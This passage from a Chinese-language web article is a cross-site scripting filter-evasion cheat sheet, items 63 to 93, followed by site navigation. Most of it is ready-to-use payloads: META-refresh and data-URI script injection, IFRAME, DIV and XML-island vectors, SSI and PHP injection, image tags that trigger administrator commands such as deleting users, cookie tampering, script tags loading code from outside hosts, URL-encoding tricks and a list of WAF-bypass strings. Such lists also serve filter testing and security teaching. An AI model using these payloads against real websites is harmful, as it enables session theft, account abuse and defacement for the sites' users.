class="syl-page-code"><code><META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"></code></pre><h1 class="pgc-h-arrow-right" data-track="758">63、使用数据的META</h1><p data-track="759">URL scheme指令。这个非常有用因为它并不包含任何可见的SCRIPT单词或JavaScript指令,因为它使用了base64编码.请查看RFC 2397寻找更多细节。你同样可以使用具有Base64编码功能的XSS工具来编码HTML或JavaScript:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"></code></pre><h1 class="pgc-h-arrow-right" data-track="761">64、含有额外URL参数的META</h1><p data-track="762">如果目标站点尝试检查URL是否包含"http://",你可以用以下技术规避它(由Moritz Naumann提交):</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"></code></pre><h1 class="pgc-h-arrow-right" data-track="764">65、IFRAME</h1><p data-track="765">如果允许Iframe那就会有很多XSS问题:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><IFRAME SRC="javascript:alert('XSS');"></IFRAME></code></pre><h1 class="pgc-h-arrow-right" data-track="767">66、基于事件IFRAME</h1><p data-track="768">Iframes和大多数其他元素可以使用下列事件(由David Cross提交):</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME></code></pre><h1 class="pgc-h-arrow-right" data-track="770">67、FRAME</h1><p data-track="771">Frames和iframe一样有很多XSS问题:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET></code></pre><h1 class="pgc-h-arrow-right" data-track="773">68、TABLE</h1><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><TABLE BACKGROUND="javascript:alert('XSS')"></code></pre><h1 class="pgc-h-arrow-right" data-track="775">69、TD</h1><p data-track="776">和上面一样,TD也可以通过BACKGROUND来包含JavaScriptXSS攻击向量:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><TABLE><TD BACKGROUND="javascript:alert('XSS')"></code></pre><h1 class="pgc-h-arrow-right" data-track="778">70、DIV背景图像</h1><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><DIV STYLE="background-image: url(javascript:alert('XSS'))"></code></pre><h1 class="pgc-h-arrow-right" data-track="780">71、含有Unicode XSS利用代码的DIV背景图像</h1><p data-track="781">这进行了一些修改来混淆URL参数。原始的漏洞是由RenaudLifchitz在Hotmail发现的:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"></code></pre><h1 class="pgc-h-arrow-right" data-track="783">72、含有额外字符的DIV背景图像</h1><p data-track="784">Rnaske进行了一个快速的XSS模糊测试来发现IE和安全模式下的Netscape 8.1中任何可以在左括号和JavaScript指令间加入的额外字符。这都是十进制的但是你也可以使用十六进制来填充(以下字符可用:1-32, 34, 39, 160, 8192-8.13, 12288, 65279):</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><DIV STYLE="background-image: url(javascript:alert('XSS'))"></code></pre><h1 class="pgc-h-arrow-right" data-track="786">73、DIV表达式</h1><p data-track="787">一个非常有效的对抗现实中的跨站脚本过滤器的变体是在冒号和"expression"之间添加一个换行:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><DIV STYLE="width: expression(alert('XSS'));"></code></pre><h1 class="pgc-h-arrow-right" data-track="789">74、html 条件选择注释块</h1><p data-track="790">只能在IE5.0及更高版本和IE渲染引擎模式下的Netscape 8.1生效。一些网站认为在注释中的任何内容都是安全的并且认为没有必要移除,这就允许我们添加跨站脚本攻击向量。系统会在一些内容周围尝试添加注释标签以便安全的渲染它们。如我们所见,这有时并不起作用:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><!--[if gte IE 4]>

 <SCRIPT>alert('XSS');</SCRIPT>

 <![endif]--></code></pre><h1 class="pgc-h-arrow-right" data-track="792">75、BASE标签</h1><p data-track="793">在IE和安全模式下的Netscape 8.1有效。你需要使用//来注释下个字符,这样你就不会造成JavaScript错误并且你的XSS标签可以被渲染。同样,这需要当前网站使用相对路径例如"images/image.jpg"来放置图像而不是绝对路径。如果路径以一个斜杠开头例如"/images/image.jpg"你可以从攻击向量中移除一个斜杠(只有在两个斜杠时注释才会生效):</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><BASE HREF="javascript:alert('XSS');//"></code></pre><h1 class="pgc-h-arrow-right" data-track="795">76、OBJECT标签</h1><p data-track="796">如果允许使用OBJECT,你可以插入一个病毒攻击载荷来感染用户,类似于APPLET标签。链接文件实际是含有你XSS攻击代码的HTML文件:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><OBJECT TYPE="text/x-scriptlet" DATA="http://127.0.0.1/scriptlet.html"></OBJECT></code></pre><h1 class="pgc-h-arrow-right" data-track="798">77、使用EMBED标签加载含有XSS的FLASH文件</h1><p data-track="799">如果你添加了属性allowScriptAccess="never"以及allownetworking="internal"则可以减小风险(感谢Jonathan Vanasco提供的信息):</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED></code></pre><h1 class="pgc-h-arrow-right" data-track="801">78、使用EMBED SVG包含攻击向量</h1><p data-track="802">该示例只在FireFox下有效,但是比上面的攻击向量在FireFox下好,因为不需要用户安装或启用FLASH。感谢nEUrOO提供:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED></code></pre><h1 class="pgc-h-arrow-right" data-track="804">79、在FLASH中使用ActionScript混淆XSS攻击向量</h1><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code>a="get";

b="URL(\"";

c="javascript:";

d="alert('XSS');\")";

eval(a+b+c+d);</code></pre><h1 class="pgc-h-arrow-right" data-track="806">80、CDATA混淆的XML数据岛</h1><p data-track="807">这个XSS攻击只在IE和使用IE渲染模式的Netscape 8.1下有效-攻击向量由Sec Consult在审计Yahoo时发现</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></code></pre><h1 class="pgc-h-arrow-right" data-track="809">81、使用XML数据岛生成含内嵌JavaScript的本地XML文件</h1><p data-track="810">这和上面是一样的但是将来源替换为了包含跨站脚本攻击向量的本地XML文件(必须在同一服务器上):</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><XML SRC="xsstest.xml" ID=I></XML>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></code></pre><h1 class="pgc-h-arrow-right" data-track="812">82、XML中使用HTML+TIME</h1><p data-track="813">这是Grey Magic攻击Hotmail和Yahoo的方法。这只在IE和IE渲染模式下的Netscape8.1有效并且记得需要在HTML域的BODY标签中间才有效:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><HTML><BODY>

<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">

<?import namespace="t" implementation="#default#time2">

<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>">

</BODY></HTML></code></pre><h1 class="pgc-h-arrow-right" data-track="815">83、使用一些字符绕过".js"过滤</h1><p data-track="816">你可以将你的JavaScript文件重命名为图像来作为XSS攻击向量:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><SCRIPT SRC="http://127.0.0.1/xss.jpg"></SCRIPT></code></pre><h1 class="pgc-h-arrow-right" data-track="818">84、SSI(服务端脚本包含)</h1><p data-track="819">这需要在服务器端允许SSI来使用XSS攻击向量。似乎不用提示这点,因为如果你可以在服务器端执行指令那一定是有更严重的问题存在:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://127.0.0.1/xss.js></SCRIPT>'"--></code></pre><h1 class="pgc-h-arrow-right" data-track="821">85、PHP</h1><p data-track="822">需要服务器端安装了PHP来使用XSS攻击向量。同样,如果你可以远程运行任意脚本,那会有更加严重的问题:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><? echo('<SCR)';

echo('IPT>alert("XSS")</SCRIPT>'); ?></code></pre><h1 class="pgc-h-arrow-right" data-track="824">86、嵌入命令的IMAGE</h1><p data-track="825">当页面受密码保护并且这个密码保护同样适用于相同域的不同页面时有效,这可以用来进行删除用户,增加用户(如果访问页面的是管理员的话),将密码发送到任意地方等等…这是一个较少使用当时更有价值的XSS攻击向量:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><IMG SRC="https://www.fujieace.com/somecommand.php?somevariables=maliciouscode"></code></pre><h1 class="pgc-h-arrow-right" data-track="827">87、嵌入命令的IMAGE II</h1><p data-track="828">这更加可怕因为这不包含任何可疑标识,除了它不在你自己的域名上。这个攻击向量使用一个302或304(其他的也有效)来重定向图片到指定命令。所以一个普通的对于访问图片链接的用户来说也有可能是一个攻击向量。下面是利用.htaccess(Apache)配置文件来实现攻击向量。(感谢Timo提供这部分。):</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code>Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser</code></pre><h1 class="pgc-h-arrow-right" data-track="830">88、Cookie篡改</h1><p data-track="831">尽管公认不太实用,但是还是可以发现一些允许使用META标签的情况下可用它来覆写cookie。另外的例子是当用户访问网站页面时,一些网站读取并显示存储在cookie中的用户名,而不是数据库中。当这两种场景结合时,你可以修改受害者的cookie以便将JavaScript注入到其页面中(你可以使用这个让用户登出或改变他们的用户状态,甚至可以让他们以你的账户登录):</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"></code></pre><h1 class="pgc-h-arrow-right" data-track="833">89、UTF-7编码</h1><p data-track="834">如果存在XSS的页面没有提供页面编码头部,或者使用了任何设置为使用UTF-7编码的浏览器,就可以使用下列方式进行攻击(感谢Roman Ivanov提供)。这在任何不改变编码类型的现代浏览器上是无效的,这也是为什么标记为完全不支持的原因。Watchfire在Google的自定义404脚本中发现这个问题:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-</code></pre><h1 class="pgc-h-arrow-right" data-track="836">90、利用HTML引号包含的XSS</h1><p data-track="837">这在IE中测试通过,但还得视情况而定。它是为了绕过那些允许"</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><SCRIPT a=">" SRC="httx://xss.rocks/xss.js"></SCRIPT></code></pre><p data-track="839">这是为了绕过那些允许"</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><SCRIPT =">" SRC="httx://xss.rocks/xss.js"></SCRIPT></code></pre><p data-track="841">另一个绕过此正则过滤" /<script((\s+\w+(\s*=\s*(?:“(.)<em>?"|'(.)</em>?‘|[^’”>\s]+))?)+\s*|\s*)src/i"的XSS:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><SCRIPT a=">" '' SRC="httx://xss.rocks/xss.js"></SCRIPT></code></pre><p data-track="843">又一个绕过正则过滤" /<script((\s+\w+(\s*=\s*(?:“(.)<em>?"|'(.)</em>?‘|[^’”>\s]+))?)+\s*|\s*)src/i"的XSS。尽管不想提及防御方法,但如果你想允许</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><SCRIPT "a='>'" SRC="httx://xss.rocks/xss.js"></SCRIPT></code></pre><p data-track="845">最后一个绕过此正则过滤" /<script((\s+\w+(\s*=\s*(?:“(.)<em>?"|'(.)</em>?‘|[^’”>\s]+))?)+\s*|\s*)src/i"的XSS,使用了重音符(在FireFox下无效):</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><SCRIPT a=`>` SRC="httx://xss.rocks/xss.js"></SCRIPT></code></pre><p data-track="847">这是一个XSS样例,用来绕过那些不会检查引号配对,而是发现任何引号就立即结束参数字符串的正则表达式:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><SCRIPT a=">'>" SRC="httx://xss.rocks/xss.js"></SCRIPT></code></pre><p data-track="849">这个XSS很让人担心,因为如果不过滤所有活动内容几乎不可能防止此攻击:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="httx://xss.rocks/xss.js"></SCRIPT></code></pre><h1 class="pgc-h-arrow-right" data-track="851">91、URL字符绕过</h1><p data-track="852">假定"http://www.google.com/"是不被允许的:</p><h1 class="pgc-h-arrow-right" data-track="853">IP代替域名</h1><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><A HREF="http://66.102.7.147/">XSS</A></code></pre><h1 class="pgc-h-arrow-right" data-track="855">URL编码</h1><p data-track="856" class="syl-line-pure-english">XSS</p><h1 class="pgc-h-arrow-right" data-track="857">双字节编码</h1><p data-track="858">(注意:还有另一种双字节编码):</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><A HREF="http://1113982867/">XSS</A></code></pre><h1 class="pgc-h-arrow-right" data-track="860">十六进制编码</h1><p data-track="861">每个数字的允许的范围大概是240位字符,就如你在第二位上看到的,并且由于十六进制是在0到F之间,所以开头的0可以省略:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A></code></pre><h1 class="pgc-h-arrow-right" data-track="863">八进制编码</h1><p data-track="864">又一次允许填充,尽管你必须保证每类在4位字符以上-例如A类,B类等等:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><A HREF="http://0102.0146.0007.00000223/">XSS</A></code></pre><h1 class="pgc-h-arrow-right" data-track="866">混合编码</h1><p data-track="867">让我们混合基本编码并在其中插入一些TAB和换行,虽然不知道浏览器为什么允许这样做。TAB和换行只有被引号包含时才有效:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><A HREF="h

ttp://6	6.000146.0x7.147/">XSS</A></code></pre><h1 class="pgc-h-arrow-right" data-track="869">协议解析绕过</h1><p data-track="870">(// 替代http://可以节约很多字节).当输入空间有限时很有用(少两个字符可能解决大问题) 而且可以轻松绕过类似"(ht|f)tp(s)?/“的正则过滤(感谢Ozh提供这部分).你也可以将”//“换成”\"。你需要保证斜杠在正确的位置,否则可能被当成相对路径URL:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><A HREF="//www.google.com/">XSS</A></code></pre><h1 class="pgc-h-arrow-right" data-track="872">Google的"feeling lucky"功能1</h1><p data-track="873">Firefox使用Google的"feeling lucky"功能根据用户输入的任何关键词来将用户重定向。如果你存在漏洞的页面在某些随机关键词上搜索引擎排名是第一的,你就可以利用这一特性来攻击FireFox用户。这使用了Firefox的"keyword:“协议。你可以像下面一样使用多个关键词"keyword:XSS+RSnake”。这在Firefox2.0后不再有效.</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><A HREF="//google">XSS</A></code></pre><h1 class="pgc-h-arrow-right" data-track="875">Google的"feeling lucky"功能2</h1><p data-track="876">这使用了一个仅在FireFox上有效的小技巧,因为它实现了"feelinglucky"功能。不像下面一个例子,这个在Opera上无效因为Opera会认为只是一个老式的HTTP基础认证钓鱼攻击,但它并不是。它只是一个畸形的URL。如果你点击了对话框的确定,它就可以生效。但是在Opera上会是一个错误对话框,所以认为其不被Opera所支持,同样在Firefox2.0后不再有效。</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><A HREF="http://ha.ckers.org@google">XSS</A></code></pre><h1 class="pgc-h-arrow-right" data-track="878">Google的"feeling lucky"功能3</h1><p data-track="879">这是一个畸形的URL只在FireFox和Opera下有效,因为它们实现了"feeling lucky"功能。像上面的例子一样,它要求你的攻击页面在Google上特定关键词排名第一(在这个示例里关键词是"google")</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><A HREF="http://google:ha.ckers.org">XSS</A></code></pre><h1 class="pgc-h-arrow-right" data-track="881">移除别名</h1><p data-track="882">当结合上面的URL,移除"www."会节约4个字节,总共为正确设置的服务器节省9字节:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><A HREF="http://google.com/">XSS</A></code></pre><h1 class="pgc-h-arrow-right" data-track="884">绝对DNS名称后额外的点</h1><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><A HREF="http://www.google.com./">XSS</A></code></pre><p data-track="886" class="syl-line-pure-english">JavaScriptlink location</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><A HREF="javascript:document.location='http://www.google.com/'">XSS</A></code></pre><h1 class="pgc-h-arrow-right" data-track="888">内容替换作为攻击向量</h1><p data-track="889">假设"http://www.google.com/"会自动替换为空。我实际使用过类似的攻击向量即通过使用转换过滤器本身(示例如下)来帮助构建攻击向量以对抗现实世界的XSS过滤器:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><A HREF="http://www.google.com/ogle.com/">XSS</A></code></pre><h1 class="pgc-h-arrow-right" data-track="891">92、字符转义表</h1><p data-track="892">下面是HTML和JavaScript中字符“<”的所有可能组合。其中大部分不会被渲染出来,但其中许多可以在某些情况下呈现出来。:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><

%3C

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

\x3c

\x3C

\u003c

\u003C</code></pre><h1 class="pgc-h-arrow-right" data-track="893">93、绕过WAF的方法</h1><p data-track="895">通用问题</p><ul><li data-track="896">存储型XSS</li></ul><p data-track="897">如果攻击者已经让XSS绕过过滤器,WAF无法阻止攻击透过。</p><ul><li data-track="898">基于JavaScript的反射型XSS</li></ul><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code>示例: <script> ... setTimeout(\"writetitle()\",$_GET[xss]) ... </script>

利用: /?xss=500); alert(document.cookie);//</code></pre><ul><li data-track="900">基于DOM的XSS</li></ul><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code>示例: <script> ... eval($_GET[xss]); ... </script>

利用: /?xss=document.cookie</code></pre><h1 class="pgc-h-arrow-right" data-track="902">通过请求重定向构造XSS</h1><p data-track="903">存在漏洞代码:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code>...

 header('Location: '.$_GET['param']);

...</code></pre><p data-track="905">同样包括:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code>...

 header('Refresh: 0; URL='.$_GET['param']);

...</code></pre><p data-track="907">这种请求不会绕过WAF:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code>/?param=javascript:alert(document.cookie)</code></pre><p data-track="909">这种请求可以绕过WAF并且XSS攻击可以在某些浏览器执行:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code>/?param=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=</code></pre><h1 class="pgc-h-arrow-right" data-track="911">绕过WAF可用字符串:</h1><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><Img src = x onerror = "javascript: window.onerror = alert; throw XSS">

<Video> <source onerror = "javascript: alert (XSS)">

<Input value = "XSS" type = text>

<applet code="javascript:confirm(document.cookie);">

<isindex x="javascript:" onmouseover="alert(XSS)">

"></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

"><img src="x:x" onerror="alert(XSS)">

"><iframe src="javascript:alert(XSS)">

<object data="javascript:alert(XSS)">

<isindex type=image src=1 onerror=alert(XSS)>

<img src=x:alert(alt) onerror=eval(src) alt=0>

<img  src="x:gif" onerror="window['al\u0065rt'](0)"></img>

<iframe/src="data:text/html,<svg onload=alert(1)>">

<meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>

<svg><script xlink:href=data:,window.open('https://www.google.com/')></script

<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">

<iframe src=javascript:alert(document.location)>

<form><a href="javascript:\u0061lert(1)">X

</script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'>

<style>//*{x:expression(alert(/xss/))}//<style></style> 

On Mouse Over

<img src="/" =_=" title="onerror='prompt(1)'">

<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe

<script x> alert(1) </script 1=2

<form><button formaction=javascript:alert(1)>CLICKME

<input/onmouseover="javaSCRIPT:confirm(1)"

<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe></code></pre><h1 class="pgc-h-arrow-right" data-track="913">Alert混淆以绕过过滤器</h1><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code>(alert)(1)

a=alert,a(1)

[1].find(alert)

top[“al”+”ert”](1)

top[/al/.source+/ert/.source](1)

al\u0065rt(1)

top[‘al\145rt’](1)

top[‘al\x65rt’](1)

top[8680439..toString(30)](1)</code></pre>
    <div class="info-share-box clearfix">
        <div class="fl">
                        <p class="tags"><strong>Tags:</strong><a href="http://www.ccvgpt.com/tags-927.html" title="查看更多有关于“ondragenter”的内容" rel="tag" target="_blank">ondragenter</a></p>
                    </div>
                <div class="fr">
                        <div class="info-share">
                <div class="social-share" data-initialized="true">
                    <a href="#" class="social-share-icon iconfont icon-weibo"></a>
                    <a href="#" class="social-share-icon iconfont icon-qq"></a>
                    <a href="#" class="social-share-icon iconfont icon-wechat"></a>
                    <a href="#" class="social-share-icon iconfont icon-qzone"></a>
                </div>
            </div>
            <script src="http://www.ccvgpt.com/zb_users/theme/txcms2/script/social-share.min.js"></script>
                    </div>
            </div>
</div>
<div class="sx mb15">
    <ul>
        <li class="fl">上一篇:            <a href="http://www.ccvgpt.com/post/25308.html" title="CAD绘图技巧180例(cad绘图常用技巧方法)">CAD绘图技巧180例(cad绘图常用技巧方法)</a>
                    </li>
        <li class="fr ziyou">下一篇:            <a href="http://www.ccvgpt.com/post/25310.html" title="Origami五分钟入门秘籍(origamiowl)">Origami五分钟入门秘籍(origamiowl)</a>
                    </li>
        <div class="clear"></div>
    </ul>
</div>

<div class="zssa mb15 sjwu"></div>
<div class="xg">
    <h2 class="ybbt">猜你喜欢</h2>
        <ul>
                <li><span class="">2025-02-04</span><i class="fa fa-caret-right"></i> <a href="http://www.ccvgpt.com/post/25326.html" title="CAD20个超级全面的小技巧,非常实用,快快收藏起来吧!(二)">CAD20个超级全面的小技巧,非常实用,快快收藏起来吧!(二)</a></li>
                <li><span class="">2025-02-04</span><i class="fa fa-caret-right"></i> <a href="http://www.ccvgpt.com/post/25325.html" title="Android 12 第二个开发者预览版,全新主题你喜欢吗?">Android 12 第二个开发者预览版,全新主题你喜欢吗?</a></li>
                <li><span class="">2025-02-04</span><i class="fa fa-caret-right"></i> <a href="http://www.ccvgpt.com/post/25324.html" title="抓大放小,瞅瞅 Qt 的几个基础模块">抓大放小,瞅瞅 Qt 的几个基础模块</a></li>
                <li><span class="">2025-02-04</span><i class="fa fa-caret-right"></i> <a href="http://www.ccvgpt.com/post/25323.html" title="40种CAD常见问题解决方法,从此不再求人">40种CAD常见问题解决方法,从此不再求人</a></li>
                <li><span class="">2025-02-04</span><i class="fa fa-caret-right"></i> <a href="http://www.ccvgpt.com/post/25322.html" title="掌握这100个CAD实用技巧,效率提高10倍">掌握这100个CAD实用技巧,效率提高10倍</a></li>
                <li><span class="">2025-02-04</span><i class="fa fa-caret-right"></i> <a href="http://www.ccvgpt.com/post/25321.html" title="《速度与激情》经典语录:怎么任性怎么来!">《速度与激情》经典语录:怎么任性怎么来!</a></li>
                <li><span class="">2025-02-04</span><i class="fa fa-caret-right"></i> <a href="http://www.ccvgpt.com/post/25320.html" title="新手必备50个常用cad+天正建筑技巧,零基础入门到精通cad!">新手必备50个常用cad+天正建筑技巧,零基础入门到精通cad!</a></li>
                <li><span class="">2025-02-04</span><i class="fa fa-caret-right"></i> <a href="http://www.ccvgpt.com/post/25319.html" title="PS可不是P图,今天就来讲讲那些英文缩写词">PS可不是P图,今天就来讲讲那些英文缩写词</a></li>
                <li><span class="">2025-02-04</span><i class="fa fa-caret-right"></i> <a href="http://www.ccvgpt.com/post/25318.html" title="Qt开发-GraphicsView编程(qt 开发)">Qt开发-GraphicsView编程(qt 开发)</a></li>
                <li><span class="">2025-02-04</span><i class="fa fa-caret-right"></i> <a href="http://www.ccvgpt.com/post/25317.html" title="「10.Delphi数据库编程」12.数据控制组件之DBGrid组件">「10.Delphi数据库编程」12.数据控制组件之DBGrid组件</a></li>
            </ul>
</div>
</div>
                    
    </div>
    
        <div class="right fr sjwu">
                
<dl class="wupd"> 
    <div class="notice"> 
        <div class="tab-hd"> 
            <ul class="tab-nav"> 
                <li class="on"><a href="javascript:;">最新文章</a></li> 
                <li><a href="javascript:;">热门文章</a></li> 
                <li><a href="javascript:;" class="wux">推荐文章</a></li>
            </ul> 
        </div> 
        <div class="tab-bd"> 
            <div class="tab-pal" style="display:block">
                <ul>
                                        
<li><span class="fr zuo10">02-04</span><a href="http://www.ccvgpt.com/post/25326.html" title="CAD20个超级全面的小技巧,非常实用,快快收藏起来吧!(二)" target="_blank">CAD20个超级全面的小技巧,非常实用,快快收藏起来吧!(二)</a></li>
<li><span class="fr zuo10">02-04</span><a href="http://www.ccvgpt.com/post/25325.html" title="Android 12 第二个开发者预览版,全新主题你喜欢吗?" target="_blank">Android 12 第二个开发者预览版,全新主题你喜欢吗?</a></li>
<li><span class="fr zuo10">02-04</span><a href="http://www.ccvgpt.com/post/25324.html" title="抓大放小,瞅瞅 Qt 的几个基础模块" target="_blank">抓大放小,瞅瞅 Qt 的几个基础模块</a></li>
<li><span class="fr zuo10">02-04</span><a href="http://www.ccvgpt.com/post/25323.html" title="40种CAD常见问题解决方法,从此不再求人" target="_blank">40种CAD常见问题解决方法,从此不再求人</a></li>
<li><span class="fr zuo10">02-04</span><a href="http://www.ccvgpt.com/post/25322.html" title="掌握这100个CAD实用技巧,效率提高10倍" target="_blank">掌握这100个CAD实用技巧,效率提高10倍</a></li>
<li><span class="fr zuo10">02-04</span><a href="http://www.ccvgpt.com/post/25321.html" title="《速度与激情》经典语录:怎么任性怎么来!" target="_blank">《速度与激情》经典语录:怎么任性怎么来!</a></li>
<li><span class="fr zuo10">02-04</span><a href="http://www.ccvgpt.com/post/25320.html" title="新手必备50个常用cad+天正建筑技巧,零基础入门到精通cad!" target="_blank">新手必备50个常用cad+天正建筑技巧,零基础入门到精通cad!</a></li>
<li><span class="fr zuo10">02-04</span><a href="http://www.ccvgpt.com/post/25319.html" title="PS可不是P图,今天就来讲讲那些英文缩写词" target="_blank">PS可不是P图,今天就来讲讲那些英文缩写词</a></li>
                                    </ul>
            </div>
            <div class="tab-pal">
                <ul>
                                        
<li><span class="fr zuo10">562℃</span><a href="http://www.ccvgpt.com/post/20302.html" title="火语言RPA流程组件--获取元素坐标值" target="_blank">火语言RPA流程组件--获取元素坐标值</a></li>
<li><span class="fr zuo10">531℃</span><a href="http://www.ccvgpt.com/post/18404.html" title="在Mac上使用谷歌浏览器进行开发者调试的技巧" target="_blank">在Mac上使用谷歌浏览器进行开发者调试的技巧</a></li>
<li><span class="fr zuo10">530℃</span><a href="http://www.ccvgpt.com/post/17182.html" title="IT技术栈:Redis的9种数据类型原来是这样!" target="_blank">IT技术栈:Redis的9种数据类型原来是这样!</a></li>
<li><span class="fr zuo10">511℃</span><a href="http://www.ccvgpt.com/post/21103.html" title="javascript中的内存管理 js内存条" target="_blank">javascript中的内存管理 js内存条</a></li>
